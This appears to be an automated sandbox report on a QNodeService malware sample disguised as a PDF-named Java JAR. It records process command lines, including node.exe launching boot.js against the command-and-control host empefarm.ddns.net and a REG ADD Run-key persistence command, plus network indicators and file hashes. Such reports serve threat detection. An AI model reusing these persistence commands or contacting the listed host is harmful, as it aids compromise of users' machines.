Analysis Overview
SHA256
0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6
Threat Level: Known bad
The file list of equipment_puma_pdf.jar was found to be: Known bad.
Malicious Activity Summary
QNodeService
Executes dropped EXE
Adds Run key to start application
JavaScript code in executable
Looks up external IP address via web service
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2020-10-05 13:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2020-10-05 13:14
Reported
2020-10-05 13:16
Platform
win7
Max time kernel
3s
Max time network
16s
Command Line
Signatures
Processes
C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2020-10-05 13:14
Reported
2020-10-05 13:16
Platform
win10v200722
Max time kernel
128s
Max time network
132s
Command Line
Signatures
QNodeService
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\8aa35a81-23a1-45e0-be91-c4ef6db99f6f = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | C:\Windows\system32\reg.exe | N/A |
JavaScript code in executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | wtfismyip.com | N/A | N/A |
| N/A | wtfismyip.com | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
C:\Windows\system32\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | nodejs.org | udp |
| N/A | 104.20.23.46:443 | nodejs.org | tcp |
| N/A | 8.8.8.8:53 | empefarm.ddns.net | udp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 8.8.8.8:53 | wtfismyip.com | udp |
| N/A | 95.217.228.176:443 | wtfismyip.com | tcp |
Files
memory/3516-51-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp
| MD5 | 9d5548aa1a52a4fd8cc9ad1c64a23a09 |
| SHA1 | 72474bd84027c0aa72b09c3f48e1c57ecf935bb2 |
| SHA256 | 0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6 |
| SHA512 | c73296d0b6cd972a90eef0e7a4c32874cf190cf2d545f2f1338ce2d3bf7dfc784a46bf514be6b7d2ebb92124e610c86667a53f7d3ebe5c31a5791a6ef8e90eb6 |
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3580-161-0x0000000000000000-mapping.dmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
| MD5 | f0b11a5823c45fc2664e116dc0323bcb |
| SHA1 | 612339040c1f927ec62186cd5012f4bb9c53c1b9 |
| SHA256 | 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99 |
| SHA512 | 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac |
memory/3580-163-0x000000AF59080000-0x000000AF59081000-memory.dmp
memory/788-164-0x0000000000000000-mapping.dmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
| MD5 | f0b11a5823c45fc2664e116dc0323bcb |
| SHA1 | 612339040c1f927ec62186cd5012f4bb9c53c1b9 |
| SHA256 | 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99 |
| SHA512 | 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac |
memory/788-166-0x0000001D75AC0000-0x0000001D75AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js
| MD5 | c686d5fcf94d07f7cee70109eba9c4d3 |
| SHA1 | 588eee04fdbf1fa372c8389c66d581e0b37afd7e |
| SHA256 | e7e4897c0bbcd7e2931011f7839a0ebe920dc14e116fb898fc5e318827dc425d |
| SHA512 | 5af3b52daafe41bf891dcd846c3b8c15c04d1da2cdb28c915cf970f2fbe3d7bba6b6fc7c291a431a2d0a437f159322401eb8aa567a146763d665ca76677853a3 |
memory/3184-168-0x0000000000000000-mapping.dmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
| MD5 | f0b11a5823c45fc2664e116dc0323bcb |
| SHA1 | 612339040c1f927ec62186cd5012f4bb9c53c1b9 |
| SHA256 | 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99 |
| SHA512 | 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac |
memory/3184-170-0x000000A1111C0000-0x000000A1111C1000-memory.dmp
memory/2180-171-0x0000000000000000-mapping.dmp
memory/1648-172-0x0000000000000000-mapping.dmp